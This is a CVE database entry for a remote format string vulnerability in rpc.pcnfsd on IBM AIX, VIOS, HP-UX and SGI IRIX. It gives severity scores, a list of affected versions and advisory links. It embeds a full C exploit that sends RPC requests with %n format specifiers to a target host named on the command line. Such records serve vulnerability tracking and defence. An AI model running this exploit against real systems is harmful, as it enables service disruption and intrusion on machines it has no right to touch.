CVE-2010-1039 : Detail

25.91%V3
Network
2010-05-20 15h00 +00:00
2018-10-10 16h57 +00:00

CVE Descriptions

Format string vulnerability in the _msgout function in rpc.pcnfsd in IBM AIX 6.1, 5.3, and earlier; IBM VIOS 2.1, 1.5, and earlier; NFS/ONCplus B.11.31_09 and earlier on HP HP-UX B.11.11, B.11.23, and B.11.31; and SGI IRIX 6.5 allows remote attackers to execute arbitrary code via an RPC request containing format string specifiers in an invalid directory name.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-134 Use of Externally-Controlled Format String
The product uses a function that accepts a format string as an argument, but the format string originates from an external source.

Metrics

Metrics Score CVSS Vector
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 14407

Publication date : 2010-07-17 22h00 +00:00
Author : Rodrigo Rubira Branco
EDB Verified : Yes

/*************************************************************************
 * Check Point Software Technologies - Vulnerability Discovery Team (VDT) *
 * Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com>              *
 *                                                                        *
 * rpc.pcnfsd syslog format string vulnerability                          *
 *************************************************************************/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>

/* pcnfsd program number, version and the two procedures used below */
#define PCNFSD_PROG     150001
#define PCNFSD_VERS     1
#define PCNFSD_PR_INIT  2
#define PCNFSD_PR_START 3

struct cm_send {
    char *s1;
    char *s2;
};

struct cm_send2 {
    char *s1;
    char *s2;
};

struct cm_reply {
    int i;
};

/* XDR encoders for the request arguments (two strings) and the reply (one int) */
bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
    if (!xdr_wrapstring(xdrs, &objp->s1))
        return (FALSE);
    if (!xdr_wrapstring(xdrs, &objp->s2))
        return (FALSE);
    return (TRUE);
}

bool_t xdr_cm_send2(XDR *xdrs, struct cm_send2 *objp)
{
    if (!xdr_wrapstring(xdrs, &objp->s1))
        return (FALSE);
    if (!xdr_wrapstring(xdrs, &objp->s2))
        return (FALSE);
    return (TRUE);
}

bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
    if (!xdr_int(xdrs, &objp->i))
        return (FALSE);
    return (TRUE);
}

int main(int argc, char *argv[])
{
    long ret, offset;
    int len, x, y, i;
    char *hostname, *b;
    CLIENT *cl;
    struct cm_send send;
    struct cm_send2 send2;
    struct cm_reply reply;
    struct timeval tm = { 10, 0 };
    enum clnt_stat stat;

    printf("-= rpc.pcnfsd remote format string exploit, tested against AIX 6.1.0 and lower =-\n");
    printf("-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\n");
    printf("-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\n\n");

    if (argc < 2) {
        printf("Usage: %s [hostname]\n", argv[0]);
        exit(1);
    }

    hostname = argv[1];

    send.s1  = "AAAA%n%n%n%n%n%n%n%n%n";  // Create the dir on /var/spool/pcnfs
    send.s2  = "";
    send2.s1 = "AAAA%n%n%n%n%n%n%n%n%n";  // Call the dir to trigger fmt bug
    send2.s2 = "";

    printf("\nSending PCNFSD_PR_INIT to the server ... ");
    if (!(cl = clnt_create(hostname, PCNFSD_PROG, PCNFSD_VERS, "udp"))) {
        clnt_pcreateerror("\nerror");
        exit(-1);
    }
    stat = clnt_call(cl, PCNFSD_PR_INIT, xdr_cm_send, (caddr_t) &send,
                     xdr_cm_reply, (caddr_t) &reply, tm);
    clnt_destroy(cl);
    printf("done!\n");

    printf("Sending PCNFSD_PR_START procedure ... ");
    if (!(cl = clnt_create(hostname, PCNFSD_PROG, PCNFSD_VERS, "udp"))) {
        clnt_pcreateerror("\nerror");
        exit(-1);
    }
    cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
    stat = clnt_call(cl, PCNFSD_PR_START, xdr_cm_send2, (caddr_t) &send2,
                     xdr_cm_reply, (caddr_t) &reply, tm);
    printf("done!\n");
    clnt_destroy(cl);

    return 0;
}

Products Mentioned

Configuration 0

Hp>>Nfs/oncplus >> Version To (including) b.11.31_09
Hp>>Hp-ux >> Version b.11.11
Hp>>Hp-ux >> Version b.11.23
Hp>>Hp-ux >> Version b.11.31

Configuration 0

Ibm>>Aix >> Version To (including) 5.3
Ibm>>Aix >> Version 1.2.1
Ibm>>Aix >> Version 1.3
Ibm>>Aix >> Version 2.2.1
Ibm>>Aix >> Version 3.1
Ibm>>Aix >> Version 3.2
Ibm>>Aix >> Version 3.2.0
Ibm>>Aix >> Version 3.2.4
Ibm>>Aix >> Version 3.2.5
Ibm>>Aix >> Version 4
Ibm>>Aix >> Version 4.0
Ibm>>Aix >> Version 4.1
Ibm>>Aix >> Version 4.1.1
Ibm>>Aix >> Version 4.1.2
Ibm>>Aix >> Version 4.1.3
Ibm>>Aix >> Version 4.1.4
Ibm>>Aix >> Version 4.1.5
Ibm>>Aix >> Version 4.2
Ibm>>Aix >> Version 4.2.0
Ibm>>Aix >> Version 4.2.1
Ibm>>Aix >> Version 4.2.1.12
Ibm>>Aix >> Version 4.3
Ibm>>Aix >> Version 4.3.0
Ibm>>Aix >> Version 4.3.1
Ibm>>Aix >> Version 4.3.2
Ibm>>Aix >> Version 4.3.3
Ibm>>Aix >> Version 5.1
Ibm>>Aix >> Version 5.1.0.10
Ibm>>Aix >> Version 5.1l
Ibm>>Aix >> Version 5.2
Ibm>>Aix >> Version 5.2.0
Ibm>>Aix >> Version 5.2.0.50
Ibm>>Aix >> Version 5.2.0.54
Ibm>>Aix >> Version 5.2.2
Ibm>>Aix >> Version 5.2_l
Ibm>>Aix >> Version 6.1
Ibm>>Aix >> Version 430

Configuration 0

Ibm>>Vios >> Version To (including) 1.5
Ibm>>Vios >> Version 1.4
Ibm>>Vios >> Version 2.1

Configuration 0

Sgi>>Irix >> Version 6.5

References

http://osvdb.org/64729
Tags : vdb-entry, x_refsource_OSVDB
http://www.ibm.com/support/docview.wss?uid=isg1IZ75440
Tags : vendor-advisory, x_refsource_AIXAPAR
http://secunia.com/advisories/39911
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/40248
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id?1023994
Tags : vdb-entry, x_refsource_SECTRACK
http://www.ibm.com/support/docview.wss?uid=isg1IZ75369
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.vupen.com/english/advisories/2010/1213
Tags : vdb-entry, x_refsource_VUPEN
http://www.ibm.com/support/docview.wss?uid=isg1IZ73757
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.ibm.com/support/docview.wss?uid=isg1IZ73599
Tags : vendor-advisory, x_refsource_AIXAPAR
http://marc.info/?l=bugtraq&m=127428077629933&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.ibm.com/support/docview.wss?uid=isg1IZ75465
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.ibm.com/support/docview.wss?uid=isg1IZ73874
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.vupen.com/english/advisories/2010/1199
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/39835
Tags : third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1024016
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2010/1212
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2010/1211
Tags : vdb-entry, x_refsource_VUPEN
http://www.ibm.com/support/docview.wss?uid=isg1IZ73590
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.ibm.com/support/docview.wss?uid=isg1IZ73681
Tags : vendor-advisory, x_refsource_AIXAPAR